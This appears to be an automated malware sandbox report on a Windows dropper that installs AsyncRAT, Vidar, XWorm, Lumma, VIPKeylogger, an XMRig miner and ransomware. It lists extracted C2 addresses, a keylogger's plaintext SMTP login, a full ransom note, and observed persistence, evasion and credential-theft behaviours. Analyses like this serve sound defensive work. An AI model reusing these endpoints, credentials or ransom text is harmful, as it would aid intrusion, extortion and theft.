asyncrat | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
170s
max time network
300s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
26/02/2025, 23:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document mod.exe
Size

8KB
MD5

69994ff2f00eeca9335ccd502198e05b
SHA1

b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA256

2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512

ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
SSDEEP

96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Malware Config

Extracted

Family

asyncrat

Version

Esco Private rat

Botnet

Default

196.251.88.53:4449

Mutex

voodynqjploelta

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

vidar

Botnet

ir7am

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

vipkeylogger

Credentials

Protocol: smtp
Host:
mail.jhxkgroup.online
Port:
587
Username:
[email protected]
Password:
7213575aceACE@@
Email To:
[email protected]

Extracted

Family

xworm

Version

5.0

185.7.214.108:4411

185.7.214.54:4411

aes.plain

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

Domain

jojo.ath.cx:1414

Mutex

AsyncMutex_7SI8OkPne

Attributes

delay
3
install
false
install_file
dllscv.exe
install_folder
%AppData%

aes.plain

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Decryptfiles.txt

Ransom Note

ATTENTION! Don't worry, you can return your files! All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key. The only method of recovering files is to purchase a decrypt tool and your key. Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned. We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision. Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours. Contact us email: [email protected] [email protected] ID :8CC62B452790576D8065CE91A4936A4E29162A7F4CE25A64E0D8721C4CAF56643E2940C74829B6C89981D682F322087BD2303482D1650BE405D79D5A15ADC59B6680213CF80D0AC84E1F84EE8F01F3FAF8ABDFCB89A36570FC753F6641F52B239C652C4D819FB3B4DE7B039CD54D55863D5D7A0710477E99C11DA83DEA62EA5E52AA1A05C70FDC407DAB89DC4FABA00B7BC769613952E9DE5A4F44412E36CBD373D03F934373C8B699FB73853B83A73FFB95868D3C2E3DDA856CF94C88186033F1358034AE805EE9E5A6CF7934D9A22AD082D53C53A1BA7010F6499BB43A8A8E79835DBE5A43C958549519F1794B0FCD93E79E7CD9ED2771CB3680AF8CDEA3A95C1C1C73AED3FE0855C6237551EDCDF8E749D348F38EF2CC27CDDABCADEFAB1D0DADEC71BC95FD9529A16FF88A2AAF84C27A58235E89E6A982CFBC254FDE43BF03A8C4466897E28BA86506FBC7B50AC4429C247893CF89E93179ADC028E7E8B3AC714FD83ED1166BD0D3A7EDAFA407B7DE1F4FB4BA9876F511F0D6B27B986DC6EC7D66E87DA4F5E65CBBFE6B14734EBF8A9721AE5D8E46BBDDC06EFC13CF6FA07EB22269ACF50E019E6EFF1ED177CC6EE2AAA8602214BC0E6FF34956048248D2F73AC9EC906E3F6FE66EEF5A1B52519BF2F72BF3651A4BE93E0D7EC07477105BADEE362B6FCF31E1A9C1F4C67DE758BD37B46D93742D406F06D91E57C5CA743EADA7E2920570653768E00586CAE5340B477577169ADE959CB1060D4851CF550678AB778407BF9868950AD26C4529044EDD880CF14519DF7D11931476DF526B15B15C5A32680859106701C8CE462A92DE220B4FB10F24B062A1D18D55B6173BF9A20942357B48807F79B360D385BE0E362D0FFABB8CFCE537CB8EF817109C7C71A6C8AD15A1541CBC672D526916A2D04BF2B256F24A62252EE1B9E2D43A0212FB3429E8C8C5827BDD4F4FD333CDC78429D2AA044894DFE344F2001C1D89B1F47EC9A47735BC7CBC127340A3DC9F437F11659681604E44FBA9D444ADEB7057E7ADF9DB2666C05E6DEEDEEF23426BF87A5BC49E92DC15806D9690A74BB0E2E90CFEC56F26C98D1F720C5C145E7E23E517DEA4BA301FC9DD1EAC2D373F9BB2771267EF319ED35CD365B6BE620C1A59C460FED90DDCDA7D4982F8A087776979DD941951F6BED9B08008707ABB085B26EA0AC8D6A858005106F065E5E287D892DB15855306BAF73455D507FD15D052885083639994627DE99911F0DAF5C65CFCFA33B7F65483E77E5AA237936B9CACD30B63BF492964C569C1DED81F0706FF798585206BE400BB96AB837FEF1C79532E23EA68B6463DE7B13FF7898B6482B241DFD996AA993DF9A49E241A3049B477AA66BF15782DFA7EA1F157D65E66B99C32A3AF313B4484E4556EF734DA8122D98202FF155F0A24C0AD2D76EA33F899CEB9BE50708347EAFA3372EEBD4E667185D5C0724A1320AB0622547B7E47D8E74590349AEE7DFF99D6232F3C9BE9702138BC458D170FA9A498FDDE30C468FB52921D2F763A1E00D322F9FD7216C0E7E1589EFE3F3B8BB76CF0DF22D6BB1CE17D375C3CC15BDB49E8A835F743EC5D9545092C916A7F131F689C1E956A31DE9C4471F24B78DC697C41D491DE9BBC9D7BF91BCCFDCDFA4700E0487934BBA1AF8C10FB4AD1D8ED348C7A94D7B5D2D01A40CE15D86E4F3C44EA7A87E6F2D248EDB63C5FB582E5DBEE7B0ECCEE9859F5C49FB4C7A161395842EE4FEB54F220014F89837E424DF0AD5EB71D491B4465E26D5380636A09272253DC99DD70964D8A5B00448E22D0EAECAA551AD3944A1449DFBD1ED9DE02965B2DAD3AAED14DD43CDA2AD2E8F881B7D9A8BA223A3815A2777FF2E9262B6D2D746DF364BF01BE55616FCFD3F6ABB67AE5C73A27CB831BD71DE5717B349873DE38855DF61DB6FE9578F412158CEB48CBABCCA976500FD305D07DB9DDE0E720B8CEF1B985556A2D4D1790546BE18D2F1197B838472177C04F78E4C9DC9A64AE3D924489438F2DF2292D29F7BE848EBB7F464C1B830C2406718F07B1304A24172E7EBBA1A93831D18BD07FE68C7A747E0F8940D28C91888416B52479C0E4142DA0CB05A86C7870C2EEB0D05C0FAD15AB515F806B8E9820398A946C6FCCE1D2BFB00EE5DBC52781365134819E00CF4701831ECADC26098A5624693CF4FB3C3FD07BBAAF462C5A54447684DAF70D030D7D00E2972BC2C9557447CE63E2BE35EC27596EE07E366FC4D1286B82458CEA01085DF1A84E8C9EE45424DB0988FABD6FC80638ED93EAC05381AD7638F223E6C77065B56F182C6FDCF33029CF8D0EF49B1E28012AFA63CB002C68FD393582E53412BA30F7C68E2A77820587B89EA9

Emails

[email protected]

Extracted

Family

lumma

https://paleboreei.biz/api

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Vidar Stealer 16 IoCs

stealer

resource	yara_rule
behavioral2/memory/3692-285-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3692-287-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3692-298-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3692-300-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3692-305-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3692-315-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3692-318-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3692-322-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3692-323-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3692-324-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3692-328-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3692-341-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3692-590-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3692-876-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3692-877-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3692-878-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/memory/5608-3659-0x0000000000C20000-0x0000000000C30000-memory.dmp	family_xworm
behavioral2/memory/5004-3664-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 5132 created 3500	5132	Wpmutnro.exe	56
PID 5412 created 3500	5412	update.exe	56

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Vipkeylogger family
vipkeylogger

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/files/0x0007000000023ec7-9439.dat	family_xmrig
behavioral2/files/0x0007000000023ec7-9439.dat	xmrig

Xmrig family
xmrig
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/memory/1912-178-0x0000000005390000-0x00000000053A8000-memory.dmp	family_asyncrat

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe

mimikatz is an open source tool to dump credentials on Windows 1 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023ebe-8796.dat	mimikatz

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4272	powershell.EXE
6348	powershell.exe
4292	powershell.exe
4280	PowerShell.exe
1956	powershell.exe
1248	powershell.exe
1932	powershell.exe
5204	powershell.exe
1932	powershell.exe
4920	powershell.exe
4340	powershell.exe
1988	powershell.exe
2568	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 30 IoCs

flow	pid	Process
231	3480	New Text Document mod.exe
231	3480	New Text Document mod.exe
231	3480	New Text Document mod.exe
231	3480	New Text Document mod.exe
231	3480	New Text Document mod.exe
231	3480	New Text Document mod.exe
231	3480	New Text Document mod.exe
197	5752	AA.exe
198	3480	New Text Document mod.exe
199	3480	New Text Document mod.exe
220	3480	New Text Document mod.exe
10	3480	New Text Document mod.exe
78	3480	New Text Document mod.exe
78	3480	New Text Document mod.exe
78	3480	New Text Document mod.exe
84	3480	New Text Document mod.exe
84	3480	New Text Document mod.exe
84	3480	New Text Document mod.exe
214	3480	New Text Document mod.exe
214	3480	New Text Document mod.exe
214	3480	New Text Document mod.exe
214	3480	New Text Document mod.exe
214	3480	New Text Document mod.exe
214	3480	New Text Document mod.exe
214	3480	New Text Document mod.exe
214	3480	New Text Document mod.exe
125	3480	New Text Document mod.exe
191	3480	New Text Document mod.exe
194	3480	New Text Document mod.exe
196	3480	New Text Document mod.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
6872	netsh.exe
5288	netsh.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 10 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
5416	chrome.exe
6104	msedge.exe
180	msedge.exe
2416	chrome.exe
3888	chrome.exe
5580	msedge.exe
4868	msedge.exe
3096	msedge.exe
4004	chrome.exe
5040	chrome.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe

Checks computer location settings 2 TTPs 12 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	coinbase.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	cryptedprosp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	osfile01.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	update.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	WindowsServices.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	WindowsLib.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	New Text Document mod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	jKuil2m4oIniPNC.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	4KKi8Zrv9nyAmhR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	AA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	clientside.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	q3na5Mc.exe

Drops startup file 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5f1c1f4a8f4a8082788e31e499b05f88.exe	svchost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe	WindowsServices.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe	WindowsServices.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smcdll.vbs	Wpmutnro.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FeedbackSize.vbs	update.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5f1c1f4a8f4a8082788e31e499b05f88.exe	svchost.exe

Executes dropped EXE 41 IoCs

pid	Process
5036	esco.exe
3488	coinbase.exe
1184	coinbase.tmp
4144	coinbase.exe
456	coinbase.tmp
3244	cryptedprosp.exe
2072	jKuil2m4oIniPNC.exe
3780	osfile01.exe
996	4KKi8Zrv9nyAmhR.exe
1484	VBUN8fn.exe
3980	6NPpGdC.exe
232	6NPpGdC.exe
4736	6NPpGdC.exe
4844	q3na5Mc.exe
4872	q3na5Mc.exe
3464	q3na5Mc.exe
3692	q3na5Mc.exe
5028	random.exe
4600	cryptedprosp.exe
4360	cryptedprosp.exe
4084	cryptedprosp.exe
456	cryptedprosp.exe
5048	jKuil2m4oIniPNC.exe
5236	4KKi8Zrv9nyAmhR.exe
5264	4KKi8Zrv9nyAmhR.exe
5276	osfile01.exe
5412	update.exe
5752	AA.exe
5816	iox.exe
6040	tcp_windows_amd64.exe
5608	js.exe
2532	Install.exe
5132	Wpmutnro.exe
6488	clientside.exe
7116	WindowsServices.exe
6664	WindowsLib.exe
6564	tmp1CD0.tmp.exe
7124	xmin.exe
6108	svchost.exe
6804	WindowsServices.exe
5496	winuspdt.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine	random.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	svchost.exe

Loads dropped DLL 6 IoCs

pid	Process
1184	coinbase.tmp
1184	coinbase.tmp
456	coinbase.tmp
456	coinbase.tmp
1912	regsvr32.exe
5668	regsvr32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 12 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jKuil2m4oIniPNC.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jKuil2m4oIniPNC.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	4KKi8Zrv9nyAmhR.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	4KKi8Zrv9nyAmhR.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	4KKi8Zrv9nyAmhR.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	cryptedprosp.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	cryptedprosp.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	cryptedprosp.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	osfile01.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	osfile01.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	osfile01.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jKuil2m4oIniPNC.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System32 = "\"C:\\Windows\\WindowsServices.exe\" .."	WindowsServices.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System32 = "\"C:\\Windows\\WindowsServices.exe\" .."	WindowsServices.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe"	WindowsServices.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe"	WindowsServices.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5f1c1f4a8f4a8082788e31e499b05f88 = "\"C:\\Windows\\svchost.exe\" .."	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\5f1c1f4a8f4a8082788e31e499b05f88 = "\"C:\\Windows\\svchost.exe\" .."	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Indicator Removal: Clear Persistence 1 TTPs 2 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

defense_evasion

Clear Persistence

T1070.009

pid	Process
2656	cmd.exe
7084	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
213	raw.githubusercontent.com
214	raw.githubusercontent.com

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
184	reallyfreegeoip.org
162	checkip.dyndns.org
172	reallyfreegeoip.org
174	reallyfreegeoip.org
179	reallyfreegeoip.org
180	reallyfreegeoip.org

Drops autorun.inf file 1 TTPs 5 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	C:\autorun.inf	svchost.exe
File opened for modification	C:\autorun.inf	svchost.exe
File created	D:\autorun.inf	svchost.exe
File created	F:\autorun.inf	svchost.exe
File opened for modification	F:\autorun.inf	svchost.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
5028	random.exe

Suspicious use of SetThreadContext 11 IoCs

description	pid	Process	procid_target
PID 3980 set thread context of 4736	3980	6NPpGdC.exe	130
PID 4844 set thread context of 3692	4844	q3na5Mc.exe	136
PID 3244 set thread context of 456	3244	cryptedprosp.exe	157
PID 2072 set thread context of 5048	2072	jKuil2m4oIniPNC.exe	159
PID 996 set thread context of 5264	996	4KKi8Zrv9nyAmhR.exe	168
PID 3780 set thread context of 5276	3780	osfile01.exe	169
PID 5608 set thread context of 5004	5608	js.exe	203
PID 5132 set thread context of 6912	5132	Wpmutnro.exe	205
PID 5496 set thread context of 7120	5496	winuspdt.exe	221
PID 5496 set thread context of 6512	5496	winuspdt.exe	222
PID 5412 set thread context of 2224	5412	update.exe	224

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WindowsServices.exe	WindowsServices.exe
File opened for modification	C:\Windows\svchost.exe	svchost.exe
File created	C:\Windows\svchost.exe	clientside.exe
File opened for modification	C:\Windows\svchost.exe	clientside.exe
File created	C:\Windows\WindowsServices.exe	WindowsServices.exe

Launches sc.exe 11 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3636	sc.exe
4752	sc.exe
5716	sc.exe
6884	sc.exe
1640	sc.exe
5476	sc.exe
6404	sc.exe
5300	sc.exe
2776	sc.exe
5748	sc.exe
4796	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 3 IoCs

pid	pid_target	Process	procid_target
552	3980	WerFault.exe	128
3096	4844	WerFault.exe	132
5168	5296	WerFault.exe	358

System Location Discovery: System Language Discovery 1 TTPs 50 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6NPpGdC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	q3na5Mc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	osfile01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VBUN8fn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6NPpGdC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	osfile01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4KKi8Zrv9nyAmhR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	q3na5Mc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	js.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	clientside.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WindowsLib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmp1CD0.tmp.exe
